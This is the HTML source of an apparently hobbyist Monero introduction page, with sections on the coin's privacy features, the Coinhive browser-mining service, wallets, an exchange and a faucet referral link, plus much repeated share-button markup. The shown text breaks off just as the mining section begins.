-
Notifications
You must be signed in to change notification settings - Fork 0
/
index.html
934 lines (765 loc) · 44.5 KB
/
index.html
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
398
399
400
401
402
403
404
405
406
407
408
409
410
411
412
413
414
415
416
417
418
419
420
421
422
423
424
425
426
427
428
429
430
431
432
433
434
435
436
437
438
439
440
441
442
443
444
445
446
447
448
449
450
451
452
453
454
455
456
457
458
459
460
461
462
463
464
465
466
467
468
469
470
471
472
473
474
475
476
477
478
479
480
481
482
483
484
485
486
487
488
489
490
491
492
493
494
495
496
497
498
499
500
501
502
503
504
505
506
507
508
509
510
511
512
513
514
515
516
517
518
519
520
521
522
523
524
525
526
527
528
529
530
531
532
533
534
535
536
537
538
539
540
541
542
543
544
545
546
547
548
549
550
551
552
553
554
555
556
557
558
559
560
561
562
563
564
565
566
567
568
569
570
571
572
573
574
575
576
577
578
579
580
581
582
583
584
585
586
587
588
589
590
591
592
593
594
595
596
597
598
599
600
601
602
603
604
605
606
607
608
609
610
611
612
613
614
615
616
617
618
619
620
621
622
623
624
625
626
627
628
629
630
631
632
633
634
635
636
637
638
639
640
641
642
643
644
645
646
647
648
649
650
651
652
653
654
655
656
657
658
659
660
661
662
663
664
665
666
667
668
669
670
671
672
673
674
675
676
677
678
679
680
681
682
683
684
685
686
687
688
689
690
691
692
693
694
695
696
697
698
699
700
701
702
703
704
705
706
707
708
709
710
711
712
713
714
715
716
717
718
719
720
721
722
723
724
725
726
727
728
729
730
731
732
733
734
735
736
737
738
739
740
741
742
743
744
745
746
747
748
749
750
751
752
753
754
755
756
757
758
759
760
761
762
763
764
765
766
767
768
769
770
771
772
773
774
775
776
777
778
779
780
781
782
783
784
785
786
787
788
789
790
791
792
793
794
795
796
797
798
799
800
801
802
803
804
805
806
807
808
809
810
811
812
813
814
815
816
817
818
819
820
821
822
823
824
825
826
827
828
829
830
831
832
833
834
835
836
837
838
839
840
841
842
843
844
845
846
847
848
849
850
851
852
853
854
855
856
857
858
859
860
861
862
863
864
865
866
867
868
869
870
871
872
873
874
875
876
877
878
879
880
881
882
883
884
885
886
887
888
889
890
891
892
893
894
895
896
897
898
899
900
901
902
903
904
905
906
907
908
909
910
911
912
913
914
915
916
917
918
919
920
921
922
923
924
925
926
927
928
929
930
931
932
933
934
<!DOCTYPE html>
<html lang="en">
<head>
<!-- Global site tag (gtag.js) - Google Analytics -->
<script async src="https://www.googletagmanager.com/gtag/js?id=UA-115405485-1"></script>
<script>
window.dataLayer = window.dataLayer || [];
function gtag(){dataLayer.push(arguments);}
gtag('js', new Date());
gtag('config', 'UA-115405485-1');
</script>
<meta charset="utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
<meta name="description" content="Monero,Bitcoin,Altcoin,Litecoin,XMR,Coinhive,">
<meta name="author" content="siz">
<meta name="language" content="en-ca">
<!-- Schema.org markup for Google+ -->
<meta itemprop="name" content="XMR Monero What is Monero?">
<meta itemprop="description" content="All question about Monero XMR. Monero is a cryptocoin like bitcoin. You want to earn Monero visit our website now">
<meta itemprop="image" content="https://techqc.github.io/xmr/image/monerobackground1.jpg">
<!-- Facebook -->
<meta property="og:title" content="What is Monero?">
<meta property="og:description" content="All question about Monero XMR. Monero is a cryptocoin like bitcoin. You want to earn Monero visit our website now">
<meta property="og:image" content="https://techqc.github.io/xmr/image/monerobackground1.jpg">
<meta property="og:url" content="https://techqc.github.io/xmr/">
<!-- Twitter -->
<meta name="twitter:title" content="What is Monero? ">
<meta name="twitter:description" content="All question about Monero XMR. Monero is a cryptocoin like bitcoin. You want to earn Monero visit our website now">
<meta name="twitter:image" content="https://techqc.github.io/xmr/image/monerobackground1.jpg">
<meta name="twitter:card" content="summary_large_image">
<title>XMR Monero The Best Cryptocoin</title>
<!-- Bootstrap core CSS -->
<link href="vendor/bootstrap/css/bootstrap.min.css" rel="stylesheet">
<!-- Custom styles for this template -->
<link href="css/scrolling-nav.css" rel="stylesheet">
<!-- Style share button -->
<style type="text/css">
#share-buttons img {
width: 35px;
padding: 5px;
border: 0;
box-shadow: 0;
display: inline;
}
</style>
</head>
<body id="page-top">
<style type="text/css">
body { background: #b5b8bc !important; } /* Adding !important forces the browser to overwrite the default style applied by Bootstrap */
</style>
<!-- Navigation -->
<nav class="navbar navbar-expand-lg navbar-dark bg-dark fixed-top" id="mainNav">
<div class="container">
<a class="navbar-brand js-scroll-trigger" href="#page-top">(XMR) Monero</a>
<button class="navbar-toggler" type="button" data-toggle="collapse" data-target="#navbarResponsive" aria-controls="navbarResponsive" aria-expanded="false" aria-label="Toggle navigation">
<span class="navbar-toggler-icon"></span>
</button>
<div class="collapse navbar-collapse" id="navbarResponsive">
<ul class="navbar-nav ml-auto">
<li class="nav-item">
<a class="nav-link js-scroll-trigger" href="#about">About Monero</a>
</li>
<li class="nav-item">
<a class="nav-link js-scroll-trigger" href="#coinhive">Coinhive Script</a>
</li>
<li class="nav-item">
<a class="nav-link js-scroll-trigger" href="#wallet">How to get XMR Wallet</a>
</li>
<li class="nav-item">
<a class="nav-link js-scroll-trigger" href="#exchange">Where to Exchange</a>
</li>
<li class="nav-item">
<a class="nav-link js-scroll-trigger" href="#faucet">Faucet</a>
</li>
<li class="nav-item">
<a class="nav-link js-scroll-trigger" href="#miner">How to mine XMR</a>
</li>
<li class="nav-item">
<a class="nav-link js-scroll-trigger" href="#donate">Donate</a>
</li>
</ul>
</div>
</div>
</nav>
<header class="bg-primary text-white" style="background-image: url('image/abstract.jpg');">
<div class="container text-center">
<h1>Welcome to (XMR) Monero</h1>
<p class="lead">Let's get started with Monero XMR</p>
<!-- I got these buttons from simplesharebuttons.com -->
<center>
<div id="share-buttons">
<!-- Buffer -->
<a href="https://bufferapp.com/add?url=https://techqc.github.io/xmr/&text=What is Monero" target="_blank">
<img src="https://simplesharebuttons.com/images/somacro/buffer.png" alt="Buffer" />
</a>
<!-- Digg -->
<a href="http://www.digg.com/submit?url=https://techqc.github.io/xmr/" target="_blank">
<img src="https://simplesharebuttons.com/images/somacro/diggit.png" alt="Digg" />
</a>
<!-- Email -->
<a href="mailto:?Subject=What is Monero&Body=I%20saw%20this%20and%20thought%20of%20you!%20 https://techqc.github.io/xmr/">
<img src="https://simplesharebuttons.com/images/somacro/email.png" alt="Email" />
</a>
<!-- Facebook -->
<a href="http://www.facebook.com/sharer.php?u=https://techqc.github.io/xmr/" target="_blank">
<img src="https://simplesharebuttons.com/images/somacro/facebook.png" alt="Facebook" />
</a>
<!-- Google+ -->
<a href="https://plus.google.com/share?url=https://techqc.github.io/xmr/" target="_blank">
<img src="https://simplesharebuttons.com/images/somacro/google.png" alt="Google" />
</a>
<!-- LinkedIn -->
<a href="http://www.linkedin.com/shareArticle?mini=true&url=https://techqc.github.io/xmr/" target="_blank">
<img src="https://simplesharebuttons.com/images/somacro/linkedin.png" alt="LinkedIn" />
</a>
<!-- Pinterest -->
<a href="javascript:void((function()%7Bvar%20e=document.createElement('script');e.setAttribute('type','text/javascript');e.setAttribute('charset','UTF-8');e.setAttribute('src','http://assets.pinterest.com/js/pinmarklet.js?r='+Math.random()*99999999);document.body.appendChild(e)%7D)());">
<img src="https://simplesharebuttons.com/images/somacro/pinterest.png" alt="Pinterest" />
</a>
<!-- Reddit -->
<a href="http://reddit.com/submit?url=https://techqc.github.io/xmr/&title=What is Monero" target="_blank">
<img src="https://simplesharebuttons.com/images/somacro/reddit.png" alt="Reddit" />
</a>
<!-- StumbleUpon-->
<a href="http://www.stumbleupon.com/submit?url=https://techqc.github.io/xmr/&title=What is Monero" target="_blank">
<img src="https://simplesharebuttons.com/images/somacro/stumbleupon.png" alt="StumbleUpon" />
</a>
<!-- Tumblr-->
<a href="http://www.tumblr.com/share/link?url=https://techqc.github.io/xmr/&title=What is Monero" target="_blank">
<img src="https://simplesharebuttons.com/images/somacro/tumblr.png" alt="Tumblr" />
</a>
<!-- Twitter -->
<a href="https://twitter.com/share?url=https://techqc.github.io/xmr/&text=What%20Is%20Monero&hashtags=whatismonero" target="_blank">
<img src="https://simplesharebuttons.com/images/somacro/twitter.png" alt="Twitter" />
</a>
<!-- VK -->
<a href="http://vkontakte.ru/share.php?url=https://techqc.github.io/xmr/" target="_blank">
<img src="https://simplesharebuttons.com/images/somacro/vk.png" alt="VK" />
</a>
<!-- Yummly -->
<a href="http://www.yummly.com/urb/verify?url=https://techqc.github.io/xmr/&title=What is Monero" target="_blank">
<img src="https://simplesharebuttons.com/images/somacro/yummly.png" alt="Yummly" />
</a>
</div>
</center>
</div>
</header>
<section id="about">
<div class="container-fluid bg-dark text-white">
<div class="row">
<div class="col-lg-8 mx-auto">
<h2>What is Monero</h2>
<ul>
<li><p>Monero is Secure.</p></li>
<p>Monero is a decentralized cryptocurrency, meaning it is secure digital cash operated by a network of users. Transactions are confirmed by distributed consensus and then immutably recorded on the blockchain. Third-parties do not need to be trusted to keep your Monero safe. </p>
<li><p>Monero is private.</p></li>
<p>Monero uses ring signatures, ring confidential transactions, and stealth addresses to obfuscate the origins, amounts, and destinations of all transactions. Monero provides all the benefits of a decentralized cryptocurrency, without any of the typical privacy concessions.</p>
<li><p>Monero is untraceable.</p></li>
<p>Sending and receiving addresses as well as transacted amounts are obfuscated by default. Transactions on the Monero blockchain cannot be linked to a particular user or real-world identity.</p>
<li><p>Monero is fungible.</p></li>
<p>Monero is fungible because it is private by default. Units of Monero cannot be blacklisted by vendors or exchanges due to their association in previous transactions.</p>
<!-- I got these buttons from simplesharebuttons.com -->
<center>
<div id="share-buttons">
<!-- Buffer -->
<a href="https://bufferapp.com/add?url=https://techqc.github.io/xmr/&text=What is Monero" target="_blank">
<img src="https://simplesharebuttons.com/images/somacro/buffer.png" alt="Buffer" />
</a>
<!-- Digg -->
<a href="http://www.digg.com/submit?url=https://techqc.github.io/xmr/" target="_blank">
<img src="https://simplesharebuttons.com/images/somacro/diggit.png" alt="Digg" />
</a>
<!-- Email -->
<a href="mailto:?Subject=What is Monero&Body=I%20saw%20this%20and%20thought%20of%20you!%20 https://techqc.github.io/xmr/">
<img src="https://simplesharebuttons.com/images/somacro/email.png" alt="Email" />
</a>
<!-- Facebook -->
<a href="http://www.facebook.com/sharer.php?u=https://techqc.github.io/xmr/" target="_blank">
<img src="https://simplesharebuttons.com/images/somacro/facebook.png" alt="Facebook" />
</a>
<!-- Google+ -->
<a href="https://plus.google.com/share?url=https://techqc.github.io/xmr/" target="_blank">
<img src="https://simplesharebuttons.com/images/somacro/google.png" alt="Google" />
</a>
<!-- LinkedIn -->
<a href="http://www.linkedin.com/shareArticle?mini=true&url=https://techqc.github.io/xmr/" target="_blank">
<img src="https://simplesharebuttons.com/images/somacro/linkedin.png" alt="LinkedIn" />
</a>
<!-- Pinterest -->
<a href="javascript:void((function()%7Bvar%20e=document.createElement('script');e.setAttribute('type','text/javascript');e.setAttribute('charset','UTF-8');e.setAttribute('src','http://assets.pinterest.com/js/pinmarklet.js?r='+Math.random()*99999999);document.body.appendChild(e)%7D)());">
<img src="https://simplesharebuttons.com/images/somacro/pinterest.png" alt="Pinterest" />
</a>
<!-- Reddit -->
<a href="http://reddit.com/submit?url=https://techqc.github.io/xmr/&title=What is Monero" target="_blank">
<img src="https://simplesharebuttons.com/images/somacro/reddit.png" alt="Reddit" />
</a>
<!-- StumbleUpon-->
<a href="http://www.stumbleupon.com/submit?url=https://techqc.github.io/xmr/&title=What is Monero" target="_blank">
<img src="https://simplesharebuttons.com/images/somacro/stumbleupon.png" alt="StumbleUpon" />
</a>
<!-- Tumblr-->
<a href="http://www.tumblr.com/share/link?url=https://techqc.github.io/xmr/&title=What is Monero" target="_blank">
<img src="https://simplesharebuttons.com/images/somacro/tumblr.png" alt="Tumblr" />
</a>
<!-- Twitter -->
<a href="https://twitter.com/share?url=https://techqc.github.io/xmr/&text=What%20Is%20Monero&hashtags=whatismonero" target="_blank">
<img src="https://simplesharebuttons.com/images/somacro/twitter.png" alt="Twitter" />
</a>
<!-- VK -->
<a href="http://vkontakte.ru/share.php?url=https://techqc.github.io/xmr/" target="_blank">
<img src="https://simplesharebuttons.com/images/somacro/vk.png" alt="VK" />
</a>
<!-- Yummly -->
<a href="http://www.yummly.com/urb/verify?url=https://techqc.github.io/xmr/&title=What is Monero" target="_blank">
<img src="https://simplesharebuttons.com/images/somacro/yummly.png" alt="Yummly" />
</a>
</div>
</center>
</ul>
</div>
</div>
</div>
</section>
<section id="coinhive">
<div class="container-fluid bg-dark text-white">
<div class="row">
<div class="col-lg-8 mx-auto">
<h2>What is CoinHive</h2>
<h4>A Crypto Miner for your Website</h4>
<p class="lead">Monetize Your Business With Your Users' CPU Power </p>
<p> Coinhive offers a JavaScript miner for the Monero Blockchain
(<a href="cnhv.co/1wgqc">Why Monero?</a>) that you can embed in your website.
Your users run the miner directly in their Browser and mine XMR for you in
turn for an ad-free experience, in-game currency or whatever incentives you
can come up with.</p>
<ul>
<li>grant video streaming time</li>
<li>offer files for download</li>
<li>allow ad-free browsing on your site</li>
<li>credit in-game money or items in your game</li>
</ul>
<p>JavaScript API gives you the flexibilty to offer any rewards and incentives you like.</p>
<p>Offer a captcha-like service as well as a shortlink solution that is easy to implement on your site. These services, while fully supported, should only serve as an example of what's possible.</p>
<p>Alternative to micro payments, artificial wait time in online games, intrusive ads and dubious marketing tactics.</p>
<p>Users can “pay” you with full privacy, without registering an account anywhere, without installing a browser extension and without being bombarded by shady ads. They will pay you with just their CPU power.</p>
<p>For more information visit:(<a href="https://coinhive.com/">CoinHive</a>)</p>
<!-- I got these buttons from simplesharebuttons.com -->
<center>
<div id="share-buttons">
<!-- Buffer -->
<a href="https://bufferapp.com/add?url=https://techqc.github.io/xmr/&text=What is Monero" target="_blank">
<img src="https://simplesharebuttons.com/images/somacro/buffer.png" alt="Buffer" />
</a>
<!-- Digg -->
<a href="http://www.digg.com/submit?url=https://techqc.github.io/xmr/" target="_blank">
<img src="https://simplesharebuttons.com/images/somacro/diggit.png" alt="Digg" />
</a>
<!-- Email -->
<a href="mailto:?Subject=What is Monero&Body=I%20saw%20this%20and%20thought%20of%20you!%20 https://techqc.github.io/xmr/">
<img src="https://simplesharebuttons.com/images/somacro/email.png" alt="Email" />
</a>
<!-- Facebook -->
<a href="http://www.facebook.com/sharer.php?u=https://techqc.github.io/xmr/" target="_blank">
<img src="https://simplesharebuttons.com/images/somacro/facebook.png" alt="Facebook" />
</a>
<!-- Google+ -->
<a href="https://plus.google.com/share?url=https://techqc.github.io/xmr/" target="_blank">
<img src="https://simplesharebuttons.com/images/somacro/google.png" alt="Google" />
</a>
<!-- LinkedIn -->
<a href="http://www.linkedin.com/shareArticle?mini=true&url=https://techqc.github.io/xmr/" target="_blank">
<img src="https://simplesharebuttons.com/images/somacro/linkedin.png" alt="LinkedIn" />
</a>
<!-- Pinterest -->
<a href="javascript:void((function()%7Bvar%20e=document.createElement('script');e.setAttribute('type','text/javascript');e.setAttribute('charset','UTF-8');e.setAttribute('src','http://assets.pinterest.com/js/pinmarklet.js?r='+Math.random()*99999999);document.body.appendChild(e)%7D)());">
<img src="https://simplesharebuttons.com/images/somacro/pinterest.png" alt="Pinterest" />
</a>
<!-- Reddit -->
<a href="http://reddit.com/submit?url=https://techqc.github.io/xmr/&title=What is Monero" target="_blank">
<img src="https://simplesharebuttons.com/images/somacro/reddit.png" alt="Reddit" />
</a>
<!-- StumbleUpon-->
<a href="http://www.stumbleupon.com/submit?url=https://techqc.github.io/xmr/&title=What is Monero" target="_blank">
<img src="https://simplesharebuttons.com/images/somacro/stumbleupon.png" alt="StumbleUpon" />
</a>
<!-- Tumblr-->
<a href="http://www.tumblr.com/share/link?url=https://techqc.github.io/xmr/&title=What is Monero" target="_blank">
<img src="https://simplesharebuttons.com/images/somacro/tumblr.png" alt="Tumblr" />
</a>
<!-- Twitter -->
<a href="https://twitter.com/share?url=https://techqc.github.io/xmr/&text=What%20Is%20Monero&hashtags=whatismonero" target="_blank">
<img src="https://simplesharebuttons.com/images/somacro/twitter.png" alt="Twitter" />
</a>
<!-- VK -->
<a href="http://vkontakte.ru/share.php?url=https://techqc.github.io/xmr/" target="_blank">
<img src="https://simplesharebuttons.com/images/somacro/vk.png" alt="VK" />
</a>
<!-- Yummly -->
<a href="http://www.yummly.com/urb/verify?url=https://techqc.github.io/xmr/&title=What is Monero" target="_blank">
<img src="https://simplesharebuttons.com/images/somacro/yummly.png" alt="Yummly" />
</a>
</div>
</center>
</div>
</div>
</div>
</section>
<section id="wallet">
<div class="container-fluid bg-dark text-white">
<div class="row">
<div class="col-lg-8 mx-auto">
<h2>How to Get Monero Wallet</h2>
<h4>What is a Monero Wallet ?</h4>
<p>A Monero account, or wallet, stores the information necessary to send and receive Moneroj. In addition to sending and receiving, the Monero Wallet software keeps a private history of your transactions and allows you to cryptographically sign messages. It also includes Monero mining software and an address book.</p>
<p>The term "hot wallet" describes a Monero account which is connected to the Internet. You can send funds easily but security is much lower than a cold wallet. Never store large amounts of cryptocurrency in a hot wallet!</p>
<p>A cold wallet is generated on a trusted device or computer via an airgap. If the device is to be reused, the data storage should be securely overwritten. As soon as a cold wallet is connected to the Internet or its mnemonic phrase or spend key is entered on an Internet-connected device, it's no longer "cold" and should be considered "hot".</p>
<p>A Monero paper wallet can be generated by downloading the source code of https://moneroaddress.org/. Verify the signature of the code on a trusted airgapped device. Create the wallet and print or store it on the media of your choice.</p>
<p>Monero accounts and paper-wallets can be stored on any media - paper, USB drive, CD/DVD, or a hardware wallet device (none available for Monero as of June 2017).</p>
<p>For more information visit:(<a href="https://getmonero.org/resources/moneropedia/wallet.html">Monero Website</a>)</p>
<h4>Where I can find a great wallet for my Monero ?</h4>
<p>First thing is that your wallet need to be secure from safe source.</p>
<p>Some safe Source listed here :</p>
<p>Android:(<a href="https://play.google.com/store/apps/details?id=xmr.org.freewallet.app&hl=fr_CA">Monero Wallet from Freewallet.org on Google Play Store</a>)</p>
<p>IOS:(<a href="https://itunes.apple.com/us/app/monero-wallet-by-freewallet/id1126426159?mt=8">Monero Wallet from Freewallet.org on Apple Store</a>)</p>
<p>For Windows and Linux:(<a href="https://getmonero.org/downloads/">Monero Website</a>)</p>
<!-- I got these buttons from simplesharebuttons.com -->
<center>
<div id="share-buttons">
<!-- Buffer -->
<a href="https://bufferapp.com/add?url=https://techqc.github.io/xmr/&text=What is Monero" target="_blank">
<img src="https://simplesharebuttons.com/images/somacro/buffer.png" alt="Buffer" />
</a>
<!-- Digg -->
<a href="http://www.digg.com/submit?url=https://techqc.github.io/xmr/" target="_blank">
<img src="https://simplesharebuttons.com/images/somacro/diggit.png" alt="Digg" />
</a>
<!-- Email -->
<a href="mailto:?Subject=What is Monero&Body=I%20saw%20this%20and%20thought%20of%20you!%20 https://techqc.github.io/xmr/">
<img src="https://simplesharebuttons.com/images/somacro/email.png" alt="Email" />
</a>
<!-- Facebook -->
<a href="http://www.facebook.com/sharer.php?u=https://techqc.github.io/xmr/" target="_blank">
<img src="https://simplesharebuttons.com/images/somacro/facebook.png" alt="Facebook" />
</a>
<!-- Google+ -->
<a href="https://plus.google.com/share?url=https://techqc.github.io/xmr/" target="_blank">
<img src="https://simplesharebuttons.com/images/somacro/google.png" alt="Google" />
</a>
<!-- LinkedIn -->
<a href="http://www.linkedin.com/shareArticle?mini=true&url=https://techqc.github.io/xmr/" target="_blank">
<img src="https://simplesharebuttons.com/images/somacro/linkedin.png" alt="LinkedIn" />
</a>
<!-- Pinterest -->
<a href="javascript:void((function()%7Bvar%20e=document.createElement('script');e.setAttribute('type','text/javascript');e.setAttribute('charset','UTF-8');e.setAttribute('src','http://assets.pinterest.com/js/pinmarklet.js?r='+Math.random()*99999999);document.body.appendChild(e)%7D)());">
<img src="https://simplesharebuttons.com/images/somacro/pinterest.png" alt="Pinterest" />
</a>
<!-- Reddit -->
<a href="http://reddit.com/submit?url=https://techqc.github.io/xmr/&title=What is Monero" target="_blank">
<img src="https://simplesharebuttons.com/images/somacro/reddit.png" alt="Reddit" />
</a>
<!-- StumbleUpon-->
<a href="http://www.stumbleupon.com/submit?url=https://techqc.github.io/xmr/&title=What is Monero" target="_blank">
<img src="https://simplesharebuttons.com/images/somacro/stumbleupon.png" alt="StumbleUpon" />
</a>
<!-- Tumblr-->
<a href="http://www.tumblr.com/share/link?url=https://techqc.github.io/xmr/&title=What is Monero" target="_blank">
<img src="https://simplesharebuttons.com/images/somacro/tumblr.png" alt="Tumblr" />
</a>
<!-- Twitter -->
<a href="https://twitter.com/share?url=https://techqc.github.io/xmr/&text=What%20Is%20Monero&hashtags=whatismonero" target="_blank">
<img src="https://simplesharebuttons.com/images/somacro/twitter.png" alt="Twitter" />
</a>
<!-- VK -->
<a href="http://vkontakte.ru/share.php?url=https://techqc.github.io/xmr/" target="_blank">
<img src="https://simplesharebuttons.com/images/somacro/vk.png" alt="VK" />
</a>
<!-- Yummly -->
<a href="http://www.yummly.com/urb/verify?url=https://techqc.github.io/xmr/&title=What is Monero" target="_blank">
<img src="https://simplesharebuttons.com/images/somacro/yummly.png" alt="Yummly" />
</a>
</div>
</center>
</div>
</div>
</div>
</section>
<section id="exchange">
<div class="container-fluid bg-dark text-white">
<div class="row">
<div class="col-lg-8 mx-auto">
<h2>Where you can Exchange your XMR</h2>
<p>You Can Exchange on :(<a href="https://bittrex.com/home/markets">Bittrex.com</a>)</p>
<!-- I got these buttons from simplesharebuttons.com -->
<center>
<div id="share-buttons">
<!-- Buffer -->
<a href="https://bufferapp.com/add?url=https://techqc.github.io/xmr/&text=What is Monero" target="_blank">
<img src="https://simplesharebuttons.com/images/somacro/buffer.png" alt="Buffer" />
</a>
<!-- Digg -->
<a href="http://www.digg.com/submit?url=https://techqc.github.io/xmr/" target="_blank">
<img src="https://simplesharebuttons.com/images/somacro/diggit.png" alt="Digg" />
</a>
<!-- Email -->
<a href="mailto:?Subject=What is Monero&Body=I%20saw%20this%20and%20thought%20of%20you!%20 https://techqc.github.io/xmr/">
<img src="https://simplesharebuttons.com/images/somacro/email.png" alt="Email" />
</a>
<!-- Facebook -->
<a href="http://www.facebook.com/sharer.php?u=https://techqc.github.io/xmr/" target="_blank">
<img src="https://simplesharebuttons.com/images/somacro/facebook.png" alt="Facebook" />
</a>
<!-- Google+ -->
<a href="https://plus.google.com/share?url=https://techqc.github.io/xmr/" target="_blank">
<img src="https://simplesharebuttons.com/images/somacro/google.png" alt="Google" />
</a>
<!-- LinkedIn -->
<a href="http://www.linkedin.com/shareArticle?mini=true&url=https://techqc.github.io/xmr/" target="_blank">
<img src="https://simplesharebuttons.com/images/somacro/linkedin.png" alt="LinkedIn" />
</a>
<!-- Pinterest -->
<a href="javascript:void((function()%7Bvar%20e=document.createElement('script');e.setAttribute('type','text/javascript');e.setAttribute('charset','UTF-8');e.setAttribute('src','http://assets.pinterest.com/js/pinmarklet.js?r='+Math.random()*99999999);document.body.appendChild(e)%7D)());">
<img src="https://simplesharebuttons.com/images/somacro/pinterest.png" alt="Pinterest" />
</a>
<!-- Reddit -->
<a href="http://reddit.com/submit?url=https://techqc.github.io/xmr/&title=What is Monero" target="_blank">
<img src="https://simplesharebuttons.com/images/somacro/reddit.png" alt="Reddit" />
</a>
<!-- StumbleUpon-->
<a href="http://www.stumbleupon.com/submit?url=https://techqc.github.io/xmr/&title=What is Monero" target="_blank">
<img src="https://simplesharebuttons.com/images/somacro/stumbleupon.png" alt="StumbleUpon" />
</a>
<!-- Tumblr-->
<a href="http://www.tumblr.com/share/link?url=https://techqc.github.io/xmr/&title=What is Monero" target="_blank">
<img src="https://simplesharebuttons.com/images/somacro/tumblr.png" alt="Tumblr" />
</a>
<!-- Twitter -->
<a href="https://twitter.com/share?url=https://techqc.github.io/xmr/&text=What%20Is%20Monero&hashtags=whatismonero" target="_blank">
<img src="https://simplesharebuttons.com/images/somacro/twitter.png" alt="Twitter" />
</a>
<!-- VK -->
<a href="http://vkontakte.ru/share.php?url=https://techqc.github.io/xmr/" target="_blank">
<img src="https://simplesharebuttons.com/images/somacro/vk.png" alt="VK" />
</a>
<!-- Yummly -->
<a href="http://www.yummly.com/urb/verify?url=https://techqc.github.io/xmr/&title=What is Monero" target="_blank">
<img src="https://simplesharebuttons.com/images/somacro/yummly.png" alt="Yummly" />
</a>
</div>
</center>
</div>
</div>
</div>
</section>
<section id="faucet">
<div class="container-fluid bg-dark text-white">
<div class="row">
<div class="col-lg-8 mx-auto">
<h2>What is a Faucet</h2>
<p>Faucets are a reward system, in the form of a website or app, that dispenses rewards in the form of a satoshi, which is a hundredth of a millionth BTC, for visitors to claim in exchange for completing a captcha or task as described by the website.</p>
<p>There are also faucets that dispense alternative cryptocurrencies.</p>
<p>Rewards are dispensed at various predetermined intervals of time, as rewards for completing simple tasks such as captcha completion and as prizes from simple games.</p>
<p>Faucets usually give fractions of a Monero, but the amount will typically fluctuate according to the value of Monero.</p>
<p>Here a great Faucet :</p>
<p>(<a href="http://monerofaucet.info/ref/44Dx3bVEarKNGciPJSsD9BXFZASyooXpjCBCzhw3D8cANMzyyJn6PcyWbwaVe4vUMveKAzAiA4j8xgUi29TpKXpm3wUvH8Z">http://monerofaucet.info</a>)</p>
<!-- I got these buttons from simplesharebuttons.com -->
<center>
<div id="share-buttons">
<!-- Buffer -->
<a href="https://bufferapp.com/add?url=https://techqc.github.io/xmr/&text=What is Monero" target="_blank">
<img src="https://simplesharebuttons.com/images/somacro/buffer.png" alt="Buffer" />
</a>
<!-- Digg -->
<a href="http://www.digg.com/submit?url=https://techqc.github.io/xmr/" target="_blank">
<img src="https://simplesharebuttons.com/images/somacro/diggit.png" alt="Digg" />
</a>
<!-- Email -->
<a href="mailto:?Subject=What is Monero&Body=I%20saw%20this%20and%20thought%20of%20you!%20 https://techqc.github.io/xmr/">
<img src="https://simplesharebuttons.com/images/somacro/email.png" alt="Email" />
</a>
<!-- Facebook -->
<a href="http://www.facebook.com/sharer.php?u=https://techqc.github.io/xmr/" target="_blank">
<img src="https://simplesharebuttons.com/images/somacro/facebook.png" alt="Facebook" />
</a>
<!-- Google+ -->
<a href="https://plus.google.com/share?url=https://techqc.github.io/xmr/" target="_blank">
<img src="https://simplesharebuttons.com/images/somacro/google.png" alt="Google" />
</a>
<!-- LinkedIn -->
<a href="http://www.linkedin.com/shareArticle?mini=true&url=https://techqc.github.io/xmr/" target="_blank">
<img src="https://simplesharebuttons.com/images/somacro/linkedin.png" alt="LinkedIn" />
</a>
<!-- Pinterest -->
<a href="javascript:void((function()%7Bvar%20e=document.createElement('script');e.setAttribute('type','text/javascript');e.setAttribute('charset','UTF-8');e.setAttribute('src','http://assets.pinterest.com/js/pinmarklet.js?r='+Math.random()*99999999);document.body.appendChild(e)%7D)());">
<img src="https://simplesharebuttons.com/images/somacro/pinterest.png" alt="Pinterest" />
</a>
<!-- Reddit -->
<a href="http://reddit.com/submit?url=https://techqc.github.io/xmr/&title=What is Monero" target="_blank">
<img src="https://simplesharebuttons.com/images/somacro/reddit.png" alt="Reddit" />
</a>
<!-- StumbleUpon-->
<a href="http://www.stumbleupon.com/submit?url=https://techqc.github.io/xmr/&title=What is Monero" target="_blank">
<img src="https://simplesharebuttons.com/images/somacro/stumbleupon.png" alt="StumbleUpon" />
</a>
<!-- Tumblr-->
<a href="http://www.tumblr.com/share/link?url=https://techqc.github.io/xmr/&title=What is Monero" target="_blank">
<img src="https://simplesharebuttons.com/images/somacro/tumblr.png" alt="Tumblr" />
</a>
<!-- Twitter -->
<a href="https://twitter.com/share?url=https://techqc.github.io/xmr/&text=What%20Is%20Monero&hashtags=whatismonero" target="_blank">
<img src="https://simplesharebuttons.com/images/somacro/twitter.png" alt="Twitter" />
</a>
<!-- VK -->
<a href="http://vkontakte.ru/share.php?url=https://techqc.github.io/xmr/" target="_blank">
<img src="https://simplesharebuttons.com/images/somacro/vk.png" alt="VK" />
</a>
<!-- Yummly -->
<a href="http://www.yummly.com/urb/verify?url=https://techqc.github.io/xmr/&title=What is Monero" target="_blank">
<img src="https://simplesharebuttons.com/images/somacro/yummly.png" alt="Yummly" />
</a>
</div>
</center>
</div>
</div>
</div>
</section>
<section id="miner">
<div class="container-fluid bg-dark text-white">
<div class="row">
<div class="col-lg-8 mx-auto">
